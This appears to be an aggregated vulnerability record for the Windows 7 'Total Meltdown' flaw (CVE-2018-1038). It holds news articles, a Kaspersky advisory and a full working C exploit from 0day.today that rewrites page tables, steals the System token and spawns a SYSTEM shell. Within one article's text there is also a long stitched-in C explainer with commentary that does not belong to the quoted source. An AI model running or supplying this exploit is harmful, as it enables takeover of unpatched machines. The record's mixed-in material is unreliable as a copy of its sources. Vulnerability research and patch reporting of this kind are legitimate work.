Enough information is out there to give the attacker an edge in creating an exploit to utilize this vulnerability,\u201d said Chris Goettl, product manager at Ivanti regarding the SharePoint vulnerability.\n\nThe April [Security Update Guide](<https://portal.msrc.microsoft.com/en-us/security-guidance>) also covers Internet Explorer, Edge, ChakraCore, Windows, Visual Studio, Microsoft Office and Office Services and Web Apps and Microsoft\u2019s Malware Protection Engine.\n\nSecurity experts say one of the most important patches rolled out Tuesday was actually identified in March ([CVE-2018-1038](<https://portal.msrc.microsoft.com/en-US/security-guidance/advisory/CVE-2018-1038>)). That\u2019s when Microsoft [released an out-of-band fix](<https://threatpost.com/microsoft-fixes-bad-patch-that-left-windows-7-server-2008-open-to-attack/130871/>) for a Windows vulnerability introduced with the [January Patch Tuesday update](<https://threatpost.com/microsoft-january-patch-tuesday-update-fixes-16-critical-bugs/129378/>). 
If exploited, the bug could allow an authenticated attacker to install programs, access stored data or create new accounts with full user rights on Windows 7 and Server 2008 R2 machines.\n\n\u201cWhile this vulnerability was identified between March and April Patch Tuesday\u2019s, CVE-2018-1038 should be a top priority for anyone who has Windows 7 for x64-based Systems or Windows Server 2008 R2 for x64-based Systems, and you have installed any of the servicing updates released during or after January 2018, you need to install 4100480 immediately to be protected from this Elevation of Privilege vulnerability,\u201d Goettl said in his commentary on Patch Tuesday.\n\nAlso of note is a patch for a Microsoft Wireless Keyboard 850 Security Feature Bypass Vulnerability ([CVE-2018-8117](<https://portal.msrc.microsoft.com/en-US/security-guidance/advisory/CVE-2018-8117>)).\n\n\u201cPatches for hardware are rare, and patches for keyboards are especially rare, so it was somewhat shocking to see this bug detailed. However, the severity of this bug should not be scoffed at,\u201d the Zero Day Initiative\u2019s (ZDI) Dustin Childs said in [an analysis of the vulnerability](<https://www.zerodayinitiative.com/blog/2018/4/10/the-april-2018-security-update-review>). \u201cThis vulnerability could affect you in two ways. First, an attacker could read your keystrokes \u2013 effectively turning your keyboard into a keystroke logger. Everything you type \u2013 passwords, account details, emails \u2013 could be viewed.\u201d\n\nAlternatively, an attacker could also inject keystrokes to an affected system by reusing the keyboard\u2019s AES encryption key.\n\nChilds also warns that a critical Windows VBScript Engine Remote Code Execution Vulnerability ([**CVE-2018-1004**](<https://portal.msrc.microsoft.com/en-US/security-guidance/advisory/CVE-2018-1004>)) also presents a heightened security risk. 
\u201cThis critical-rated bug for the VBScript engine acts somewhat like a browser bug, but it\u2019s actually more impactful,\u201d he said. To exploit the vulnerability an attacker hosts a malicious website and tricks a victim to browse the site.\n\n\u201cAn attacker who successfully exploited the vulnerability could gain the same user rights as the current user. If the current user is logged on with administrative user rights, an attacker who successfully exploited the vulnerability could take control of an affected system. An attacker could then install programs; view, change, or delete data; or create new accounts with full user rights,\u201d [according to Microsoft](<https://portal.msrc.microsoft.com/en-US/security-guidance/advisory/CVE-2018-1004>).\n\nMicrosoft also alerted users to five Graphics Remote Code Execution Vulnerabilities ([**CVE-2018-1010**](<https://portal.msrc.microsoft.com/en-US/security-guidance/advisory/CVE-2018-1010>)**, **[**-1012**](<https://portal.msrc.microsoft.com/en-US/security-guidance/advisory/CVE-2018-1012>)**, **[**-1013**](<https://portal.msrc.microsoft.com/en-US/security-guidance/advisory/CVE-2018-1013>)**, **[**-1015**](<https://portal.msrc.microsoft.com/en-US/security-guidance/advisory/CVE-2018-1015>)**, **[**-1016**](<https://portal.msrc.microsoft.com/en-US/security-guidance/advisory/CVE-2018-1016>)) tied to the Windows Font Library. \u201cEach of these patches covers a vulnerability in embedded fonts that could allow code execution at the logged-on user level. 
Since there are many ways to view fonts \u2013 web browsing, documents, attachments \u2013 it\u2019s a broad attack surface and attractive to attackers,\u201d ZDI noted.\n\nJimmy Graham, director of product management at Qualys, [noted in online commentary](<https://blog.qualys.com/laws-of-vulnerabilities/2018/04/10/april-patch-tuesday-63-microsoft-vulnerabilities-19-for-adobe>) that, \u201cThe majority of the Microsoft critical vulnerabilities are in browsers and browser-related technologies. It is recommended that these be prioritized for workstation-type devices. Any system that accesses the Internet via a browser should be patched.\u201d\n\nMicrosoft Malware Protection Engine was fixed last week in an out-of-band security update.\n\nEarlier on Tuesday,[ Adobe fixed four critical vulnerabilities](<https://threatpost.com/adobe-patches-four-critical-bugs-in-flash-indesign/131097/>) in its Flash Player and InDesign products as part of its regularly scheduled [April Security Bulletin](<https://threatpost.com/adobe-patches-four-critical-bugs-in-flash-indesign/131097/>). Patches for Adobe Flash Player for Microsoft Edge and IE 11 were part of that update. 
Adobe said Edge and IE users will each be automatically updated to the latest versions.\n", "modified": "2018-04-10T21:16:16", "published": "2018-04-10T21:16:16", "id": "THREATPOST:4A749C6BAE245B913C6360FD1697CE7C", "href": "https://threatpost.com/microsoft-fixes-66-bugs-in-april-patch-tuesday-release/131127/", "type": "threatpost", "title": "Microsoft Fixes 66 Bugs in April Patch Tuesday Release", "cvss": {"score": 9.3, "vector": "AV:NETWORK/AC:MEDIUM/Au:NONE/C:COMPLETE/I:COMPLETE/A:COMPLETE/"}}], "thn": [{"lastseen": "2018-03-31T13:14:30", "bulletinFamily": "info", "cvelist": ["CVE-2018-1038"], "description": "[](<https://1.bp.blogspot.com/-TSTd2OLw2tk/WrzUI25OFtI/AAAAAAAADKU/XEpFMSbmWbAjiSsx9jN0nY8VuPQp5yLHgCLcBGAs/s1600-e20/intel-min.jpg>)\n\nMeltdown CPU vulnerability was bad, and Microsoft somehow made the flaw even worse on its Windows 7, allowing any unprivileged, user-level application to read content from and even write data to the operating system's kernel memory. \n \nFor those unaware, Spectre and Meltdown were security flaws disclosed by researchers earlier this year in processors from Intel, ARM, and AMD, leaving nearly every PC, server, and mobile phone on the planet vulnerable to data theft. \n \nShortly after the researchers disclosed the [Spectre and Meltdown exploits](<https://thehackernews.com/2018/01/meltdown-spectre-vulnerability.html>), software vendors, including Microsoft, started releasing patches for their systems running a vulnerable version of processors. \n \nHowever, an independent Swedish security researcher **Ulf Frisk** found that Microsoft's security fixes to Windows 7 PCs for the Meltdown flaw\u2014which could allow attackers to read kernel memory at a speed of 120 KBps\u2014is now allowing attackers to read the same kernel memory at a speed of Gbps, making the issue even worse on Windows 7 PCs and Server 2008 R2 boxes. 
\n \nFrisk is the same researcher who previously discovered a way to [steal the password from virtually any Mac](<https://thehackernews.com/2016/12/hack-macbook-password.html>) laptop in just 30 sec by exploiting flaws in Apple's FileVault disk encryption system, allowing attackers to unlock any Mac system and even decrypt files on its hard drive. \n \nThe discovery is the latest issue surrounding [Meltdown and Spectre patches](<https://thehackernews.com/2018/01/meltdown-spectre-patches.html>) that were sometimes found incomplete and [sometimes broken](<https://thehackernews.com/2018/01/intel-meltdown-spectre-patch.html>), causing problems such as spontaneous reboots and other 'unpredictable' system behavior on affected PCs. \n \nAccording to Frisk, the problem with MS' early Meltdown fixes occurs due to a single bit (that controls the permission to access kernel memory) accidentally being flipped from supervisor-only to any-user in a virtual-to-physical-memory translator called PML4, allowing any user-mode application to access the kernel page tables. \n \nThe PML4 is the base of the 4-level in-memory page table hierarchy that Intel's CPU Memory Management Unit (MMU) uses to translate the virtual memory addresses of a process into physical memory addresses in RAM. \n \nThe correctly set bit normally ensures the kernel has exclusive access to these tables. \n\n\n> \"The User/Supervisor permission bit was set to User in the PML4 self-referencing entry. This made the page tables available to user mode code in every process. The page tables should normally only be accessible by the kernel itself,\" Frisk explains in his [blog post](<http://blog.frizk.net/2018/03/total-meltdown.html>).\n\nTo prove his claim, Frisk also provided a detailed breakdown and a [proof-of-concept exploit](<https://news.ycombinator.com/item?id=16693599>). 
The issue affects only the 64-bit versions of Windows 7 and Windows Server 2008 R2; Windows 10 and Windows 8.1 never received the defective page-table change and are not affected. \n \n\n\n### Buggy Patch Allows Reading Gigabytes of Data in a Second\n\n \nBecause Windows 7 maps the PML4 at a fixed, well-known virtual address in every process, \"no fancy exploits\" are needed to take advantage of the flaw. \n\n\n> \"Windows 7 already did the hard work of mapping in the required memory into every running process,\" Frisk said. \"Exploitation was just a matter of read and write to already mapped in-process virtual memory. No fancy APIs or syscalls required - just standard read and write!\"\n\nOnce read/write access has been gained to the page tables, it is \"trivially easy\" to gain access to the entire physical memory, \"unless it is additionally protected by Extended Page Tables (EPTs) used for Virtualization,\" Frisk said. \n \nAll an attacker has to do is write their own Page Table Entries (PTEs) into the page tables, mapping whatever physical memory they want into their own address space. \n \nAt the time of writing, Frisk said he had not been able to link the new vulnerability to anything on the public list of Common Vulnerabilities and Exposures (it was later assigned CVE-2018-1038, see the update below). He also invited researchers to test the flaw using the PCILeech toolkit he maintains on GitHub. \n \n\n\n### **UPDATE: Microsoft Releases Emergency Patch**\n\nIn the wake of the researcher's finding, Microsoft released an emergency patch on Thursday for the vulnerability (CVE-2018-1038), which had been introduced by the Meltdown patch the company issued earlier this year. 
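The self-referencing PML4 trick Frisk describes, and the fixed PML4_BASE/PDP_BASE/PD_BASE/PT_BASE constants that the exploit further down this page hard-codes, both follow from one number: Windows 7 x64 keeps its PML4 self-reference at index 0x1ed. The C program below is an added example, not Frisk's code and not the exploit's. It derives those constants, locates the self-referencing PML4 entry whose U/S bit the January patch set to User, and decodes entry flag bits such as the 0xe7 the exploit writes into its 2 MiB page-directory entries. It only does address arithmetic, so it builds and runs on any host; the entry values it labels patched and buggy are constructed for illustration, not read from a real machine, and all function names are my own.

```c
/*
 * Added example: x86-64 self-referencing page-table arithmetic behind
 * "Total Meltdown".  Not from the original page or from the exploit it
 * quotes.  Windows 7 x64 keeps its PML4 self-reference at index 0x1ed,
 * which is where the exploit's fixed PML4/PDP/PD/PT constants come from.
 * Pure arithmetic, builds anywhere:  cc -std=c99 -Wall selfref.c
 */
#include <stdio.h>
#include <stdint.h>
#include <stdbool.h>
#include <string.h>

#define WIN7_SELF_REF 0x1edULL   /* PML4 slot Windows 7 x64 uses for the self-map */

/* Flag bits shared by all four paging levels (Intel SDM vol. 3, chapter 4). */
#define PTE_P   (1ULL << 0)    /* present */
#define PTE_RW  (1ULL << 1)    /* writable */
#define PTE_US  (1ULL << 2)    /* 1 = user mode may access: the bit the bad patch set */
#define PTE_A   (1ULL << 5)    /* accessed */
#define PTE_D   (1ULL << 6)    /* dirty */
#define PTE_PS  (1ULL << 7)    /* page size: in a PDE, a 2 MiB large page */
#define PTE_NX  (1ULL << 63)   /* no-execute */
#define PTE_ADDR_MASK 0x000FFFFFFFFFF000ULL

/* Sign-extend a 48-bit linear address into canonical 64-bit form. */
static uint64_t canonical(uint64_t va)
{
    va &= 0x0000FFFFFFFFFFFFULL;
    return (va & (1ULL << 47)) ? va | 0xFFFF000000000000ULL : va;
}

/*
 * Virtual address of the entry that maps `va` at `level` (1 = PTE, 2 = PDE,
 * 3 = PDPTE, 4 = PML4E) when PML4[s] points back at the PML4 page.  Every
 * extra pass through the self-reference entry puts one more `s` in the top
 * index slot and slides the original indices down by 9 bits, so the paging
 * structures become plain readable/writable memory at fixed addresses.
 */
static uint64_t entry_va(uint64_t s, int level, uint64_t va)
{
    uint64_t addr = 0;
    for (int i = 0; i < level; i++)
        addr |= s << (39 - 9 * i);
    unsigned low = 3 + 9 * level;                 /* lowest va bit that survives */
    uint64_t idx = va & 0x0000FFFFFFFFFFFFULL & ~((1ULL << low) - 1);
    return canonical(addr | (idx >> (9 * level)));
}

/* Base of the region holding every table of one level (all indices zero). */
static uint64_t table_base(uint64_t s, int level) { return entry_va(s, level, 0); }

/* First byte of the 512 GiB window that a hijacked PML4 slot maps. */
static uint64_t pml4_slot_window(uint64_t slot) { return canonical(slot << 39); }

/* Physical address an entry points at (bits 51:12). */
static uint64_t entry_phys(uint64_t e) { return e & PTE_ADDR_MASK; }

/* True when ring 3 may walk through this entry: present and U/S == user. */
static bool entry_user_accessible(uint64_t e) { return (e & PTE_P) && (e & PTE_US); }

/* Flag bits as text, e.g. "P RW US A D PS".  Static buffer, not reentrant. */
static const char *describe_entry(uint64_t e)
{
    static const struct { uint64_t bit; const char *name; } names[] = {
        { PTE_P, "P" }, { PTE_RW, "RW" }, { PTE_US, "US" }, { PTE_A, "A" },
        { PTE_D, "D" }, { PTE_PS, "PS" }, { PTE_NX, "NX" },
    };
    static char buf[64];
    buf[0] = '\0';
    for (size_t i = 0; i < sizeof names / sizeof names[0]; i++) {
        if (!(e & names[i].bit)) continue;
        if (buf[0]) strcat(buf, " ");
        strcat(buf, names[i].name);
    }
    return buf;
}

int main(void)
{
    const uint64_t s = WIN7_SELF_REF;
    for (int level = 4; level >= 1; level--)
        printf("level %d table base  %#018llx\n", level, (unsigned long long)table_base(s, level));

    /* The PML4 entry that refers to the PML4 itself: the one whose U/S bit was wrong. */
    printf("self-reference PML4E at %#018llx\n",
           (unsigned long long)entry_va(s, 4, table_base(s, 4)));

    /* Constructed entry values (not read from a real machine): same PFN, U/S differs. */
    uint64_t patched = 0x1a2b000ULL | PTE_P | PTE_RW | PTE_A | PTE_D;
    uint64_t buggy   = patched | PTE_US;
    printf("patched entry: %-16s user-walkable=%d\n", describe_entry(patched), entry_user_accessible(patched));
    printf("buggy entry:   %-16s user-walkable=%d\n", describe_entry(buggy), entry_user_accessible(buggy));

    /* Where a hijacked PML4 slot 256 lands, and what the exploit's PDPT pointer 0x10067 addresses. */
    printf("slot 256 window %#018llx, PDPT phys %#llx\n",
           (unsigned long long)pml4_slot_window(256), (unsigned long long)entry_phys(0x10067ULL));
    /* The exploit's 2 MiB PDE flag byte 0xe7: present, writable, user, large page. */
    printf("PDE flags 0xe7 = %s\n", describe_entry(0xe7));
    return 0;
}
```

The U/S check is the whole difference between the patched and unpatched state: a kernel page-table entry with both P and US set is walkable from ring 3, and because the self-reference entry sits at the same address in every Windows 7 x64 process, no information leak is needed to find it. On a real host the probe is simply a user-mode read of table_base(0x1ed, 4): it faults on a patched system and succeeds on a vulnerable one, which is exactly what the exploit's __try block below does before it starts writing entries.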
\n \n\n\n> The out-of-band security update for Microsoft Windows 7 and Windows Server 2008 R2 \"addresses an elevation of privilege vulnerability in the Windows kernel in the 64-Bit (x64) version of Windows.\"\n\n \nAccording to the Microsoft [advisory](<https://portal.msrc.microsoft.com/en-US/security-guidance/advisory/CVE-2018-1038>), the elevation of privilege flaw occurs when the Windows kernel fails to handle objects in memory properly. Successful exploitation could allow an attacker to run arbitrary code in kernel mode. \n \n\n\n> \"An attacker could then install programs; view, change, or delete data; or create new accounts with full user rights,\" the advisory states.\n\n \nOnly Windows 7 Service Pack 1 (x64) and Windows Server 2008 R2 Service Pack 1 (x64) are affected; no other Windows version is impacted. \n \nAll admins and users of Windows 7 x64 and Windows Server 2008 R2 x64 are strongly advised to install KB4100480 as soon as possible.\n", "modified": "2018-03-31T09:38:13", "published": "2018-03-29T03:36:00", "id": "THN:7354CA31230FA4D48BE905015B9C3B76", "href": "https://thehackernews.com/2018/03/microsofts-meltdown-vulnerability.html", "type": "thn", "title": "Microsoft's Meltdown Patch Made Windows 7 PCs More Insecure", "cvss": {"score": 0.0, "vector": "NONE"}}], "kaspersky": [{"lastseen": "2020-09-02T11:52:59", "bulletinFamily": "info", "cvelist": ["CVE-2018-1038"], "description": "### *Detect date*:\n03/29/2018\n\n### *Severity*:\nHigh\n\n### *Description*:\nPE vulnerability was found in Microsoft Products (Extended Support Update). 
Malicious users can exploit this vulnerability to gain privileges.\n\n### *Affected products*:\nWindows Server 2008 R2 for x64-based Systems Service Pack 1 (Server Core installation) \nWindows Server 2008 R2 for Itanium-Based Systems Service Pack 1 \nWindows 7 for x64-based Systems Service Pack 1 \nWindows Server 2008 R2 for x64-based Systems Service Pack 1 \nWindows 7 for 32-bit Systems Service Pack 1\n\n### *Solution*:\nInstall the necessary updates from the KB list below; they are offered through Windows Update (usually reachable from the Control Panel).\n\n### *Original advisories*:\n[CVE-2018-1038](<https://portal.msrc.microsoft.com/api/security-guidance/en-US/CVE/CVE-2018-1038>) \n\n\n### *Impacts*:\nPE \n\n### *Related products*:\n[Microsoft Windows](<https://threats.kaspersky.com/en/product/Microsoft-Windows/>)\n\n### *CVE-IDS*:\n[CVE-2018-1038](<https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2018-1038>)\n\n### *Microsoft official advisories*:\n\n\n### *KB list*:\n[4100480](<http://support.microsoft.com/kb/4100480>)\n\n### *Exploitation*:\nThe following public exploits exist for this vulnerability:", "edition": 33, "modified": "2020-06-18T00:00:00", "published": "2018-03-29T00:00:00", "id": "KLA11219", "href": "https://threats.kaspersky.com/en/vulnerability/KLA11219", "title": "KLA11219: PE vulnerability in Microsoft Products (ESU)", "type": "kaspersky", "cvss": {"score": 7.2, "vector": "AV:L/AC:L/Au:N/C:C/I:C/A:C"}}], "zdt": [{"lastseen": "2018-05-07T06:31:58", "description": "Exploit for the Windows platform in category local exploits", "edition": 1, "published": "2018-05-03T00:00:00", "title": "Windows - Local Privilege Escalation Exploit", "type": "zdt", "bulletinFamily": "exploit", "cvelist": ["CVE-2018-1038"], "modified": "2018-05-03T00:00:00", "id": "1337DAY-ID-30292", "href": "https://0day.today/exploit/description/30292", "sourceData": "#include \"stdafx.h\"\r\n \r\n#define PML4_BASE 0xFFFFF6FB7DBED000\r\n#define PDP_BASE 
0xFFFFF6FB7DA00000\r\n#define PD_BASE 0xFFFFF6FB40000000\r\n#define PT_BASE 0xFFFFF68000000000\r\n \r\ntypedef LARGE_INTEGER PHYSICAL_ADDRESS, *PPHYSICAL_ADDRESS;\r\n \r\n#pragma pack(push,4)\r\ntypedef struct _CM_PARTIAL_RESOURCE_DESCRIPTOR {\r\n UCHAR Type;\r\n UCHAR ShareDisposition;\r\n USHORT Flags;\r\n union {\r\n struct {\r\n PHYSICAL_ADDRESS Start;\r\n ULONG Length;\r\n } Generic;\r\n \r\n struct {\r\n PHYSICAL_ADDRESS Start;\r\n ULONG Length;\r\n } Port;\r\n \r\n struct {\r\n#if defined(NT_PROCESSOR_GROUPS)\r\n USHORT Level;\r\n USHORT Group;\r\n#else\r\n ULONG Level;\r\n#endif\r\n ULONG Vector;\r\n KAFFINITY Affinity;\r\n } Interrupt;\r\n \r\n struct {\r\n union {\r\n struct {\r\n#if defined(NT_PROCESSOR_GROUPS)\r\n USHORT Group;\r\n#else\r\n USHORT Reserved;\r\n#endif\r\n USHORT MessageCount;\r\n ULONG Vector;\r\n KAFFINITY Affinity;\r\n } Raw;\r\n \r\n struct {\r\n#if defined(NT_PROCESSOR_GROUPS)\r\n USHORT Level;\r\n USHORT Group;\r\n#else\r\n ULONG Level;\r\n#endif\r\n ULONG Vector;\r\n KAFFINITY Affinity;\r\n } Translated;\r\n } DUMMYUNIONNAME;\r\n } MessageInterrupt;\r\n \r\n struct {\r\n PHYSICAL_ADDRESS Start; \r\n ULONG Length;\r\n } Memory;\r\n \r\n struct {\r\n ULONG Channel;\r\n ULONG Port;\r\n ULONG Reserved1;\r\n } Dma;\r\n \r\n struct {\r\n ULONG Channel;\r\n ULONG RequestLine;\r\n UCHAR TransferWidth;\r\n UCHAR Reserved1;\r\n UCHAR Reserved2;\r\n UCHAR Reserved3;\r\n } DmaV3;\r\n \r\n struct {\r\n ULONG Data[3];\r\n } DevicePrivate;\r\n \r\n struct {\r\n ULONG Start;\r\n ULONG Length;\r\n ULONG Reserved;\r\n } BusNumber;\r\n \r\n struct {\r\n ULONG DataSize;\r\n ULONG Reserved1;\r\n ULONG Reserved2;\r\n } DeviceSpecificData;\r\n \r\n struct {\r\n PHYSICAL_ADDRESS Start;\r\n ULONG Length40;\r\n } Memory40;\r\n \r\n struct {\r\n PHYSICAL_ADDRESS Start;\r\n ULONG Length48;\r\n } Memory48;\r\n \r\n struct {\r\n PHYSICAL_ADDRESS Start;\r\n ULONG Length64;\r\n } Memory64;\r\n \r\n struct {\r\n UCHAR Class;\r\n UCHAR Type;\r\n UCHAR 
Reserved1;\r\n UCHAR Reserved2;\r\n ULONG IdLowPart;\r\n ULONG IdHighPart;\r\n } Connection;\r\n \r\n } u;\r\n} CM_PARTIAL_RESOURCE_DESCRIPTOR, *PCM_PARTIAL_RESOURCE_DESCRIPTOR;\r\n#pragma pack(pop,4)\r\n \r\ntypedef enum _INTERFACE_TYPE {\r\n InterfaceTypeUndefined,\r\n Internal,\r\n Isa,\r\n Eisa,\r\n MicroChannel,\r\n TurboChannel,\r\n PCIBus,\r\n VMEBus,\r\n NuBus,\r\n PCMCIABus,\r\n CBus,\r\n MPIBus,\r\n MPSABus,\r\n ProcessorInternal,\r\n InternalPowerBus,\r\n PNPISABus,\r\n PNPBus,\r\n Vmcs,\r\n ACPIBus,\r\n MaximumInterfaceType\r\n} INTERFACE_TYPE, *PINTERFACE_TYPE;\r\n \r\ntypedef struct _CM_PARTIAL_RESOURCE_LIST {\r\n USHORT Version;\r\n USHORT Revision;\r\n ULONG Count;\r\n CM_PARTIAL_RESOURCE_DESCRIPTOR PartialDescriptors[1];\r\n} CM_PARTIAL_RESOURCE_LIST, *PCM_PARTIAL_RESOURCE_LIST;\r\n \r\ntypedef struct _CM_FULL_RESOURCE_DESCRIPTOR {\r\n INTERFACE_TYPE InterfaceType;\r\n ULONG BusNumber;\r\n CM_PARTIAL_RESOURCE_LIST PartialResourceList;\r\n} *PCM_FULL_RESOURCE_DESCRIPTOR, CM_FULL_RESOURCE_DESCRIPTOR;\r\n \r\ntypedef struct _CM_RESOURCE_LIST {\r\n ULONG Count;\r\n CM_FULL_RESOURCE_DESCRIPTOR List[1];\r\n} *PCM_RESOURCE_LIST, CM_RESOURCE_LIST;\r\n \r\nstruct memory_region {\r\n ULONG64 size;\r\n ULONG64 address;\r\n};\r\n \r\n// Very hack'y way of trying to map out physical memory regions to try and reduce\r\n// risk of BSOD\r\nDWORD parse_memory_map(struct memory_region *regions) {\r\n HKEY hKey = NULL;\r\n LPTSTR pszSubKey = L\"Hardware\\\\ResourceMap\\\\System Resources\\\\Physical Memory\";\r\n LPTSTR pszValueName = L\".Translated\";\r\n LPBYTE lpData = NULL;\r\n DWORD dwLength = 0, count = 0, type = 0;;\r\n \r\n if (!RegOpenKey(HKEY_LOCAL_MACHINE, pszSubKey, &hKey) == ERROR_SUCCESS)\r\n {\r\n printf(\"[*] Could not get reg key\\n\");\r\n return 0;\r\n }\r\n \r\n if (!RegQueryValueEx(hKey, pszValueName, 0, &type, NULL, &dwLength) == ERROR_SUCCESS)\r\n {\r\n printf(\"[*] Could not query hardware key\\n\");\r\n return 0;\r\n }\r\n \r\n lpData = 
(LPBYTE)malloc(dwLength);\r\n RegQueryValueEx(hKey, pszValueName, 0, &type, lpData, &dwLength);\r\n \r\n CM_RESOURCE_LIST *resource_list = (CM_RESOURCE_LIST *)lpData;\r\n \r\n for (int i = 0; i < resource_list->Count; i++) {\r\n for (int j = 0; j < resource_list->List[0].PartialResourceList.Count; j++) {\r\n if (resource_list->List[i].PartialResourceList.PartialDescriptors[j].Type == 3) {\r\n regions->address = resource_list->List[i].PartialResourceList.PartialDescriptors[j].u.Memory.Start.QuadPart;\r\n regions->size = resource_list->List[i].PartialResourceList.PartialDescriptors[j].u.Memory.Length;\r\n regions++;\r\n count++;\r\n }\r\n }\r\n }\r\n \r\n return count;\r\n}\r\n \r\nint main()\r\n{\r\n printf(\"TotalMeltdown PrivEsc exploit by @_xpn_\\n\");\r\n printf(\" paging code by @UlfFrisk\\n\\n\");\r\n \r\n unsigned long long iPML4, vaPML4e, vaPDPT, iPDPT, vaPD, iPD;\r\n DWORD done;\r\n DWORD count;\r\n \r\n // Parse registry for physical memory regions\r\n printf(\"[*] Getting physical memory regions from registry\\n\");\r\n struct memory_region *regions = (struct memory_region *)malloc(sizeof(struct memory_region) * 10);\r\n \r\n count = parse_memory_map(regions);\r\n if (count == 0) {\r\n printf(\"[X] Could not find physical memory region, quitting\\n\");\r\n return 2;\r\n }\r\n \r\n for (int i = 0; i < count; i++) {\r\n printf(\"[*] Phyiscal memory region found: %p - %p\\n\", regions[i].address, regions[i].address + regions[i].size);\r\n }\r\n \r\n // Check for vulnerability\r\n __try {\r\n int test = *(unsigned long long *)PML4_BASE;\r\n }\r\n __except (EXCEPTION_EXECUTE_HANDLER) {\r\n printf(\"[X] Could not access PML4 address, system likely not vulnerable\\n\");\r\n return 2;\r\n }\r\n \r\n // setup: PDPT @ fixed hi-jacked physical address: 0x10000\r\n // This code uses the PML4 Self-Reference technique discussed, and iterates until we find a \"free\" PML4 entry\r\n // we can hijack.\r\n for (iPML4 = 256; iPML4 < 512; iPML4++) {\r\n vaPML4e = PML4_BASE + 
(iPML4 << 3);\r\n if (*(unsigned long long *)vaPML4e) { continue; }\r\n \r\n // When we find an entry, we add a pointer to the next table (PDPT), which will be\r\n // stored at the physical address 0x10000\r\n *(unsigned long long *)vaPML4e = 0x10067;\r\n break;\r\n }\r\n printf(\"[*] PML4 Entry Added At Index: %d\\n\", iPML4);\r\n \r\n // Here, the PDPT table is referenced via a virtual address.\r\n // For example, if we added our hijacked PML4 entry at index 256, this virtual address\r\n // would be 0xFFFFF6FB7DA00000 + 0x100000\r\n // This allows us to reference the physical address 0x10000 as:\r\n // PML4 Index: 1ed | PDPT Index : 1ed | PDE Index : 1ed | PT Index : 100\r\n vaPDPT = PDP_BASE + (iPML4 << (9 * 1 + 3));\r\n printf(\"[*] PDPT Virtual Address: %p\", vaPDPT);\r\n \r\n // 2: setup 31 PDs @ physical addresses 0x11000-0x1f000 with 2MB pages\r\n // Below is responsible for adding 31 entries to the PDPT\r\n for (iPDPT = 0; iPDPT < 31; iPDPT++) {\r\n *(unsigned long long *)(vaPDPT + (iPDPT << 3)) = 0x11067 + (iPDPT << 12);\r\n }\r\n \r\n // For each of the PDs, a further 512 PT's are created. 
This gives access to\r\n // 512 * 32 * 2mb = 33gb physical memory space\r\n for (iPDPT = 0; iPDPT < 31; iPDPT++) {\r\n if ((iPDPT % 3) == 0)\r\n printf(\"\\n[*] PD Virtual Addresses: \");\r\n \r\n vaPD = PD_BASE + (iPML4 << (9 * 2 + 3)) + (iPDPT << (9 * 1 + 3));\r\n printf(\"%p \", vaPD);\r\n \r\n for (iPD = 0; iPD < 512; iPD++) {\r\n // Below, notice the 0xe7 flags added to each entry.\r\n // This is used to create a 2mb page rather than the standard 4096 byte page.\r\n *(unsigned long long *)(vaPD + (iPD << 3)) = ((iPDPT * 512 + iPD) << 21) | 0xe7;\r\n }\r\n }\r\n \r\n printf(\"\\n[*] Page tables created, we now have access to ~31gb of physical memory\\n\");\r\n \r\n #define EPROCESS_IMAGENAME_OFFSET 0x2e0\r\n #define EPROCESS_TOKEN_OFFSET 0x208\r\n #define EPROCESS_PRIORITY_OFFSET 0xF // This is the offset from IMAGENAME, not from base\r\n \r\n unsigned long long ourEPROCESS = 0, systemEPROCESS = 0;\r\n unsigned long long exploitVM = 0xffff000000000000 + (iPML4 << (9 * 4 + 3));\r\n STARTUPINFOA si;\r\n PROCESS_INFORMATION pi;\r\n \r\n ZeroMemory(&si, sizeof(si));\r\n si.cb = sizeof(si);\r\n ZeroMemory(&pi, sizeof(pi));\r\n \r\n printf(\"[*] Hunting for _EPROCESS structures in memory\\n\");\r\n \r\n for (int j = 0; j < count; j++) {\r\n printf(\"[*] Trying physical region %p - %p\\n\", regions[j].address, regions[j].address + regions[j].size);\r\n \r\n for (unsigned long long i = regions[j].address; i < +regions[j].address + regions[j].size; i++) {\r\n \r\n __try {\r\n // Locate EPROCESS via the IMAGE_FILE_NAME field, and PRIORITY_CLASS field\r\n if (ourEPROCESS == 0 && memcmp(\"TotalMeltdownP\", (unsigned char *)(exploitVM + i), 14) == 0) {\r\n if (*(unsigned char *)(exploitVM + i + EPROCESS_PRIORITY_OFFSET) == 0x2) {\r\n ourEPROCESS = exploitVM + i - EPROCESS_IMAGENAME_OFFSET;\r\n printf(\"[*] Found our _EPROCESS at %p\\n\", ourEPROCESS);\r\n }\r\n }\r\n // Locate EPROCESS via the IMAGE_FILE_NAME field, and PRIORITY_CLASS field\r\n else if (systemEPROCESS == 0 
&& memcmp(\"System\\0\\0\\0\\0\\0\\0\\0\\0\\0\", (unsigned char *)(exploitVM + i), 14) == 0) {\r\n if (*(unsigned char *)(exploitVM + i + EPROCESS_PRIORITY_OFFSET) == 0x2) {\r\n systemEPROCESS = exploitVM + i - EPROCESS_IMAGENAME_OFFSET;\r\n printf(\"[*] Found System _EPROCESS at %p\\n\", systemEPROCESS);\r\n }\r\n }\r\n \r\n if (systemEPROCESS != 0 && ourEPROCESS != 0) {\r\n // Swap the tokens by copying the pointer to System Token field over our process token\r\n printf(\"[*] Copying access token from %p to %p\\n\", systemEPROCESS + EPROCESS_TOKEN_OFFSET, ourEPROCESS + EPROCESS_TOKEN_OFFSET);\r\n *(unsigned long long *)((char *)ourEPROCESS + EPROCESS_TOKEN_OFFSET) = *(unsigned long long *)((char *)systemEPROCESS + EPROCESS_TOKEN_OFFSET);\r\n printf(\"[*] Done, spawning SYSTEM shell...\\n\\n\");\r\n \r\n CreateProcessA(0,\r\n \"cmd.exe\",\r\n NULL,\r\n NULL,\r\n TRUE,\r\n 0,\r\n NULL,\r\n \"C:\\\\windows\\\\system32\",\r\n &si,\r\n &pi);\r\n break;\r\n }\r\n }\r\n __except (EXCEPTION_EXECUTE_HANDLER) {\r\n printf(\"[X] Exception occured, stopping to avoid BSOD\\n\");\r\n return 2;\r\n }\r\n }\r\n }\r\n return 0;\r\n}\n\n# 0day.today [2018-05-07] #", "cvss": {"score": 7.2, "vector": "AV:LOCAL/AC:LOW/Au:NONE/C:COMPLETE/I:COMPLETE/A:COMPLETE/"}, "sourceHref": "https://0day.today/exploit/30292"}], "qualysblog": [{"lastseen": "2019-01-23T20:50:13", "bulletinFamily": "blog", "cvelist": ["CVE-2018-1038"], "description": "The [Meltdown/Spectre saga](<https://blog.qualys.com/news/2018/01/16/meltdown-spectre-mitigation-is-a-work-in-progress#resources>) 